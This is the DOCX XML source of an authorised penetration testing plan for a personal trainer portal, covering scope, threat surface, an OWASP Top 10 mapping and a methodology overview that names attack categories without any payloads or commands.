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E3A5F"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="D97706"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Sulfri Trainer Portal — Personal Brand Edition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Base SRS v1.0 + Change Requests CR-01 through CR-05 (Target Version v1.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="600" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared For:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Mohd Sulfri Mohd Harris</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Platform:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Next.js 14 App Router + PostgreSQL + Vercel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Version:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  1.0 (aligned to SRS v1.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  CONFIDENTIAL — For Internal / Authorised Tester Use Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  March 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Scope &amp;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
              <w:bottom w:val="single" w:color="1E3A5F" w:sz="1"/>
              <w:right w:val="single" w:color="1E3A5F" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF3FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E3A5F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Legal Notice</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">This penetration testing document is authorised exclusively for use against the Sulfri Trainer Portal owned by Mohd Sulfri Mohd Harris, hosted at sulfri-portal.vercel.app. All testing must be conducted in a staging or pre-production environment unless written consent is obtained for production testing. Unauthorised use of these test cases against any other system constitutes a criminal offence under applicable cybersecurity laws.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 Authorised Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following systems, routes, and services are in scope for penetration testing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Production / Staging URL: sulfri-portal.vercel.app (staging clone recommended)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All public routes: /, /badges, /skills, /expertise, /join/{join_code}, /downloads, /event-register, /proposal, /contact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All admin routes: /admin/* (authenticated endpoints)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All API routes: /api/* as documented in SRS v1.0 and CR-01 through CR-05</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Database layer: PostgreSQL (indirect — via API response analysis, not direct DB access)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Third-party integrations: Credly embed/CSP, Resend/SendGrid transactional email, GA4 event tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Out of Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Direct access to Vercel infrastructure, server OS, or hosting configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Credly.com platform itself — only the embed integration within this portal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Denial of Service (DoS) or Distributed DoS attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical security testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Social engineering of personnel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing of third-party dependencies not listed in the SRS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Testing Environment Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Before commencing testing, the tester must confirm the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A dedicated staging environment is deployed at a non-production URL (e.g., staging.sulfri-portal.vercel.app).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A test admin account is available with credentials provided by the system owner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A clean PostgreSQL database seed is available for rollback after destructive tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Written authorisation is obtained from Mohd Sulfri Mohd Harris prior to any testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All test traffic is clearly identifiable (e.g., via a custom User-Agent header: X-Pentest: authorized).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Technology Stack &amp; Threat Surface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1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358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358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Key Security Considerations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Frontend</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Next.js 14 App Router, Tailwind CSS, shadcn/ui</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XSS, client-side secret exposure, CSP headers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Backend</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Next.js API Routes (serverless on Vercel)</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Auth bypass, IDOR, rate limiting, input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ORM / DB</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Prisma ORM + PostgreSQL</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SQL injection via raw queries, schema exposure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Auth</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JWT / NextAuth.js</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Token tampering, session fixation, brute force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File Storage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Cloud object storage (S3-compatible)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Path traversal, SSRF, malicious file upload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Email</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Resend or SendGrid (transactional)</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Header injection, API key leakage, open relay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3rd Party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Credly (embed + OB3 API)</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Script injection via embed, CSP bypass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Analytics</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GA4 + internal analytics_events table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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PII exposure, IP hash bypass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PDF Generation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Puppeteer or @react-pdf/renderer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SSRF, path traversal, resource exhaustion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 OWASP Top 10 Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The test cases in this document are mapped to the OWASP Top 10 (2021)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OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Applicable Test Cases (Section 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A01 — Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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PT-AUTH-003, PT-IDOR-001, PT-IDOR-002, PT-IDOR-003</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A02 — Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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PT-AUTH-001, PT-AUTH-002, PT-EMAIL-002, PT-PDPA-001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A03 — Injection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PT-INJ-001, PT-INJ-002, PT-INJ-003, PT-INJ-004, PT-INJ-005</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A05 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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PT-INFO-001, PT-INFO-002, PT-GA4-001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A06 — Vulnerable Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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PT-CREDLY-001, PT-CREDLY-002</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A07 — Auth &amp; Session Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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PT-AUTH-004, PT-RATE-003</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A08 — Software &amp; Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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PT-FILE-001, PT-FILE-002, PT-FILE-003</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A09 — Security Logging Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="61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PT-EMAIL-001, PT-INFO-001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A10 — SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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PT-FILE-002, PT-INJ-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Approach</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing follows a grey-box approach: the tester has access to the SRS documentation (v1.0 + CR-01 to CR-05), the public GitHub repository (github.com/frieta10), and a non-admin authenticated session. Direct database access is not provided.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2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62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Activities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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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Enumerate public routes, API endpoints, HTTP headers, error messages. Review SRS and GitHub repo for exposed configs, hardcoded secrets, and commented-out debug code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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Authentication Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="624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Brute force protection, JWT manipulation, session management, admin route access control.</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Input Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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SQL injection, XSS, SSTI across all form inputs, API parameters, and file upload fields.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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Authorisation &amp; IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="624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Attempt to access or modify other users' records via manipulated IDs in API requests.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Business Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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Duplicate submission bypasses, consent flag manipulation, rate limit evasion, proposal cooldown bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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Third-Party Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="624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Credly embed injection, CSP validation, email header injection, Resend API key exposure.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File &amp; PDF Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="62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Malicious upload, path traversal, SSRF via PDF generation, storage URL exposure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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PDPA / Compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
